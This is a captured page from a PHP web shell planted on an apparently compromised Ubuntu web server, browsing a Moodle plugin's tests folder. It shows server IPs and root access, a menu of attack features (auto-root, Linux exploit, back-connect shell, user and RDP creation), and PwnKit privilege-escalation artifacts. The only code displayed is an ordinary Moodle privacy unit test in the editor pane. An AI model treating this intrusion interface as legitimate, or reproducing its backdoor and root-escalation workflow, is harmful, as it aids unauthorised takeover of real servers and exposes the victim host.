Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
repository /
flickr /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
generator
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
privacy_test.php
3.38
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : privacy_test.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Privacy tests for repository_flickr. * * @package repository_flickr * @category test * @copyright 2018 Zig Tan <zig@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); use \repository_flickr\privacy\provider; use \core_privacy\local\request\approved_contextlist; use \core_privacy\local\request\writer; use \core_privacy\tests\provider_testcase; /** * Unit tests for repository/flickr/privacy/provider * * @copyright 2018 Zig Tan <zig@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class repository_flickr_privacy_testcase extends provider_testcase { /** * Overriding setUp() function to always reset after tests. */ public function setUp() { $this->resetAfterTest(true); } /** * Test for provider::export_user_preferences(). */ public function test_export_user_preferences() { global $DB; // Test setup. $user = $this->getDataGenerator()->create_user(); $this->setUser($user); $contextlist = provider::get_contexts_for_userid($user->id); $approvedcontextlist = new approved_contextlist($user, 'repository_flickr', $contextlist->get_contextids()); $user = $approvedcontextlist->get_user(); $contextuser = context_user::instance($user->id); // Test exporting of Flickr repository user preferences *without* OAuth token/secret preference configured. provider::export_user_preferences($user->id); $writer = writer::with_context($contextuser); // Verify there is no user preferences data exported. $this->assertFalse($writer->has_any_data()); // Test exporting of Flickr repository user preferences *with* OAuth token/secret preference configured. set_user_preferences([ 'repository_flickr_access_token' => 'dummy flickr oauth access token', 'repository_flickr_access_token_secret' => 'dummy flickr oauth access token secret', ], $user->id); provider::export_user_preferences($user->id); $writer = writer::with_context($contextuser); // Verify there is user preferences data exported. $this->assertTrue($writer->has_any_data()); $userpreferences = $writer->get_user_preferences('repository_flickr'); // Verify the OAuth token is not an empty string value and the OAuth secret is an empty string value. $accesstoken = $userpreferences->repository_flickr_access_token; $this->assertFalse(empty($accesstoken->value)); $accesstokensecret = $userpreferences->repository_flickr_access_token_secret; $this->assertTrue(empty($accesstokensecret->value)); } }
Close